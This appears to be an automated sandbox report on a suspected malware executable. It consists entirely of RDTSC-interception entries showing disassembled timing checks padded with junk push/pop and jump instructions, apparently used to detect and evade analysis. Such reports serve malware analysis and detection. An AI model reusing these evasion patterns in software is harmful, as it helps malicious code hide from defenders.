Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5396D1 second address: 5396D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5396D9 second address: 5396DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5396DF second address: 5396E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5396E3 second address: 5396E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5396E7 second address: 5396F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F77A0BA2866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 538A6B second address: 538A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 538BEA second address: 538BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 538D35 second address: 538D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 53F96E second address: 53F972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 53F972 second address: 53F976 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 53F976 second address: 53F97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5404F1 second address: 5404FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F77A0B95E06h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5404FF second address: 54051F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F77A0BA2866h 0x0000000a pop eax 0x0000000b jmp 00007F77A0BA286Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 jnl 00007F77A0BA2866h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 54051F second address: 540536 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jng 00007F77A0B95E2Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007F77A0B95E06h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 540AB9 second address: 540ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 540ABD second address: 540AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 540AC1 second address: 540B01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jne 00007F77A0BA2866h 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F77A0BA2876h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007F77A0BA2866h 0x00000021 jmp 00007F77A0BA286Eh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5412B9 second address: 5412DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0B95E18h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5412DA second address: 5412DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 541594 second address: 5415AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F77A0B95E0Eh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A47B2 second address: 4A47B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 549701 second address: 549707 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 549875 second address: 5498BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F77A0BA286Dh 0x00000008 jmp 00007F77A0BA2871h 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007F77A0BA286Bh 0x00000014 jmp 00007F77A0BA2876h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5499FC second address: 549A06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 549A06 second address: 549A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F77A0BA286Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 549A18 second address: 549A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 549A21 second address: 549A47 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F77A0BA286Ch 0x00000008 ja 00007F77A0BA2866h 0x0000000e pushad 0x0000000f jmp 00007F77A0BA2875h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 549A47 second address: 549A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5514D8 second address: 5514F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2878h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5514F4 second address: 551524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jns 00007F77A0B95E06h 0x0000000f popad 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 push ecx 0x00000017 jmp 00007F77A0B95E13h 0x0000001c pop ecx 0x0000001d popad 0x0000001e push esi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 551524 second address: 55152A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 54F936 second address: 54F93A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 54FEEE second address: 54FEF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F77A0BA2866h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 55006A second address: 550075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F77A0B95E06h 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 550CD5 second address: 550CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 550CD9 second address: 550CE6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F77A0B95E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 550CE6 second address: 550CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 55138F second address: 551393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 551393 second address: 551399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 555BCD second address: 555BE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F77A0B95E0Ch 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 555BE4 second address: 555C0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F77A0BA2875h 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jns 00007F77A0BA2866h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 555C0B second address: 555C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E0Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 555C1B second address: 555C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 555C21 second address: 555C54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E16h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007F77A0B95E17h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 55AA68 second address: 55AA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 55AA73 second address: 55AA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 55AA79 second address: 55AA85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F77A0BA2866h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 55AA85 second address: 55AA8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A9A12 second address: 4A9A27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA286Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 4A9A27 second address: 4A9A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5700CB second address: 5700D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 57A28F second address: 57A2B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F77A0B95E13h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jp 00007F77A0B95E06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 57A2B2 second address: 57A2D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F77A0BA287Ch 0x0000000f jmp 00007F77A0BA2874h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 57A139 second address: 57A13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 57A13F second address: 57A144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 57A144 second address: 57A15C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F77A0B95E14h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5821FB second address: 5821FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5821FF second address: 58221B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0B95E18h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 58221B second address: 582236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F77A0BA2870h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 582236 second address: 58223A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5809A1 second address: 5809A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 580B31 second address: 580B5F instructions: 0x00000000 rdtsc 0x00000002 js 00007F77A0B95E1Ah 0x00000008 jmp 00007F77A0B95E14h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F77A0B95E0Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 580B5F second address: 580B64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 580B64 second address: 580B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F77A0B95E06h 0x0000000a je 00007F77A0B95E06h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 580CD9 second address: 580CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 580CFC second address: 580D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 580E5E second address: 580E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 581435 second address: 58143C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5838BA second address: 5838CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA286Ch 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 587F56 second address: 587F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 587F5A second address: 587F63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 587F63 second address: 587F6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 587F6C second address: 587F71 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 59B5BA second address: 59B5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F77A0B95E06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5A9F53 second address: 5A9F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0BA286Bh 0x00000009 jmp 00007F77A0BA286Eh 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5A9F74 second address: 5A9FB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F77A0B95E10h 0x0000000b jo 00007F77A0B95E06h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007F77A0B95E12h 0x00000019 pushad 0x0000001a jg 00007F77A0B95E06h 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5A9FB5 second address: 5A9FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5A9FB9 second address: 5A9FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F77A0B95E06h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5A9FC9 second address: 5A9FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5ABA72 second address: 5ABA76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5ABA76 second address: 5ABA7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C3936 second address: 5C393E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C393E second address: 5C3943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C3AA2 second address: 5C3AC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jbe 00007F77A0B95E06h 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F77A0B95E06h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F77A0B95E0Ah 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C3AC6 second address: 5C3AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F77A0BA2876h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C3AE7 second address: 5C3AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C3F1A second address: 5C3F20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C3F20 second address: 5C3F24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C4343 second address: 5C4347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C448D second address: 5C4493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C4493 second address: 5C4498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C4498 second address: 5C449D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C449D second address: 5C44BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F77A0BA2873h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8C0D second address: 5C8C12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8CC7 second address: 5C8CCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8CCE second address: 5C8CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d pop ecx 0x0000000e nop 0x0000000f mov dword ptr [ebp+122D2B51h], esi 0x00000015 push 00000004h 0x00000017 mov dh, 22h 0x00000019 call 00007F77A0B95E09h 0x0000001e je 00007F77A0B95E2Bh 0x00000024 push eax 0x00000025 push edx 0x00000026 ja 00007F77A0B95E06h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\lIocM276SA.exe	RDTSC instruction interceptor: First address: 5C8CFE second address: 5C8D22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F77A0BA2879h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
